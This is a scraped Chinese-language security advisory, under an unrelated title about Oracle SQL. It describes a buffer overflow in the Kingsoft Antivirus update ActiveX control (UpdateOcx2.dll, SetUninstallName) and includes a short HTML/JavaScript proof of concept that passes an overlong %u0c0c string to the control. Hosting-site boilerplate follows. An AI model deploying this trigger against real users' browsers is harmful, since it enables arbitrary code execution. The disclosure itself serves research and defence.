oracle常用經典SQL查詢貼)

來源:互聯網
上載者:User

Kingsoft Antivirus Online Update Module是一款反病毒線上升級模組。
Kingsoft Antivirus線上升級模組包含的ActiveX控制項不正確處理使用者提交的參數資料,遠程攻擊者可以利用漏洞以應用程式進程許可權執行任意指令。
問題存在於C:/WINDOWS/system32/KingSoft/KOS/UpdateOcx2.dll控制項對SetUninstallName()方法的處理中,構建超長字串作為SetUninstallName()方法參數資料,並誘使使用者訪問惡意WEB頁,可導致觸發緩衝區溢位,可能以應用程式進程許可權執行任意指令。

測試方法:

[警 告]

以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用.風險自負!

----------------------------------------------------------------------------------- 
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object> 
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object> 
<script> 
var str1 = ""; 
while (str1.length < 914) 
{ str1 += unescape("%u0c0c"); 

target1.SetUninstallName(str1); 
</script> 
----------------------------------------------------------------------------------- 

建議:
目前沒有解決方案提供:
http://en.kingsoft.com/

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.